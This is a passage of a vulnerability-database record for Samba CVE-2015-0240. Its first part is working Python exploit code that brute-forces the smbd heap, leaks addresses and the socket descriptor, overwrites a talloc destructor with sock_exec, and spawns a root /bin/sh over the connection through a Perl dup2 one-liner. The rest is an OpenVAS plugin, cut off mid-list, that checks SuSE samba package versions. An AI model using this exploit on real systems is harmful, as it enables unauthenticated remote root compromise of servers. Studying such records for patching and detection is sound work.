text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], 
info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n 
print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. 
try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += 
force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. 
getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... 
cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. 
accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to double check the 
bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address 
in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89724", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850934", "title": "SuSE Update for samba SUSE-SU-2015:0353-1 (samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0353_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for samba SUSE-SU-2015:0353-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850934\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:40:29 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for samba SUSE-SU-2015:0353-1 (samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"samba was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n These non-security issues were fixed:\n\n - Fix vfs_snapper DBus string handling (bso#11055, bnc#913238).\n\n - Fix libsmbclient DFS referral handling.\n + Reuse connections derived from DFS referrals (bso#10123).\n + Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n - pam_winbind: Fix warn_pwd_expire implementation (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules (bso#9299).\n\n - Fix profiles tool (bso#9629).\n\n - s3-lib: Do not require a password with --use-ccache (bso#10279).\n\n - s4:dsdb/rootdse: Expand extended dn values 
with the AS_SYSTEM control\n (bso#10949).\n\n - s4-rpc: dnsserver: Fix enumeration of IPv4 and IPv6 addresses\n (bso#10952).\n\n - s3:smb2_server: Allow reauthentication without signing (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output (bso#10961).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows\n client does (bso#10966).\n\n - s3: smbd/modules: Fix *allocate* calls to follow POSIX error return\n convention (bso#10982).\n\n - Fix 'domain join' by adding 'drsuapi.DsBindInfoFallBack' attribute\n 'supported_extensions' (bso#11006).\n\n - idl:drsuapi: Manage all possible lengths of drsuapi_DsBindInfo\n (bso#11006).\n\n - winbind: Retry LogonControl RPC in ping-dc after session expiration\n (bso#11034).\n\n - yast2-samba-client should be able to specify osName and osVer on AD\n domain join (bnc#873922).\n\n - Lookup FSRVP share snums at runtime rather than storing them\n persistently (bnc#908627).\n\n - Specify soft dependency for network-online.target in Winbind systemd\n service file (bnc#889175).\n\n - Fix spoolss error response marshalling (bso#10984).\n\n - pidl/wscript: Remove --with-perl-* options revert buildtools/wafadmin/\n Tools/perl.py back to upstream state (bso#10472).\n\n - s4-dns: Add support for BIND 9.10 (bso#10620).\n\n - nmbd fails to accept '--piddir' option (bso#10711).\n\n - S3: source3/smbd/process.c::srv_send_smb() returns true on the error\n path (bso#10880).\n\n - vfs_glusterfs: Remove 'integer fd' code and store the glfs pointers\n (bso#10889).\n\n - s3-nmbd: Fix netbios name truncation (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels (bso#10898).\n\n - spoolss: Fix jobid in level 3 EnumJobs response (bso#10905).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored\n (bso#10920).\n\n - s3:smb ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n 
script_tag(name:\"affected\", value:\"samba on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0353_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", 
rpm:\"libdcerpc0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0\", rpm:\"libndr-krb5pac0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", rpm:\"libndr-krb5pac0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.1.12~16.1\", 
rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-32bit\", rpm:\"libpdb0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0\", rpm:\"libpdb0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo-32bit\", rpm:\"libpdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo\", rpm:\"libpdb0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.1.12~16.1\", 